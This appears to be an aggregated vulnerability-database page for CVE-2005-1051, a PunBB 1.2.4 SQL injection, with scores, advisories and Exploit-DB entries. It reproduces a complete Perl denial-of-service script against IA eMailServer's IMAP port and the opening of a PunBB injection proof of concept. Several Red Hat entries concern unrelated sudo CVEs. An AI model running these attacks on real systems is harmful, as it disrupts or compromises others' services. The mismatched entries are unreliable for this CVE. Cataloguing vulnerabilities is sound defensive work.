CVE-2005-1051
Published 2005-05-02
Priority: P4 · 28 · medium · 6.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
EXPLOIT
EPSS: 2.07% (79.0th percentile)
SQL injection vulnerability in profile.php in PunBB 1.2.4 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a change_email action.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| punbb | punbb | — | — |
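CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| vendor_redhat | — | 7.2 | HIGH | — |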
GHSA
GHSA-9c26-35wc-9jmc: SQL injection vulnerability in profile
ghsa_unreviewed·2022-05-01
CVE-2005-1051 [MEDIUM] GHSA-9c26-35wc-9jmc: SQL injection vulnerability in profile
SQL injection vulnerability in profile.php in PunBB 1.2.4 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a change_email action.
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2004-1051 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "()" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname.
Statement: We do not consider this to be a security issue:
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=139478#c1
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2005-4158 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
Sudo before 1.6.8 p12, when the Perl taint flag is off, does not clear the (1) PERLLIB, (2) PERL5LIB, and (3) PERL5OPT environment variables, which allows limited local users to cause a Perl script to include and execute arbitrary library files that have the same name as library files that are included by the script.
Statement: We do not consider this to be a security issue.
https://bugzilla.redhat.com/show_bug.cgi?id=139478#c1
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2006-0151 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
sudo 1.6.8 and other versions does not clear the PYTHONINSPECT environment variable, which allows limited local users to gain privileges via a Python script, a variant of CVE-2005-4158.
Statement: We do not consider this to be a security issue.
https://bugzilla.redhat.com/show_bug.cgi?id=139478#c1
No detection rules found.
Exploit-DB
IA eMailServer Corporate Edition 5.2.2 - Denial of Service
exploitdb·2005-06-26
CVE-2005-2083 IA eMailServer Corporate Edition 5.2.2 - Denial of Service
---
```perl
#===== Start IAeMailServer_DOS.pl =====
#
# Usage: IAeMailServer_DOS.pl
# IAeMailServer_DOS.pl 127.0.0.1
#
# True North Software, Inc. IA eMailServer Corporate Edition
# Version: 5.2.2. Build: 1051.
#
# Download:
# http://www.tnsoft.com/
#
############################################################
use IO::Socket;
use strict;

my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
    print "Attempting to kill IA eMailServer at $ARGV[0]:143...";
    sleep(1);
    print $socket "0000 LOGIN hello moto\r\n";
    sleep(1);
    print $socket "0001 LIST 1 \%x\r\n";
    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:143\n";
}
#===== End IAeMailServer_DOS.pl =====
# milw0rm.com
```
Exploit-DB
PunBB 1.2.4 - 'id' SQL Injection
exploitdb·2005-04-11
CVE-2005-1051 PunBB 1.2.4 - 'id' SQL Injection
---
```python
#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
import urllib
import getopt
import sys
import string
```
No writeups or analysis indexed.
Published: 2005-05-02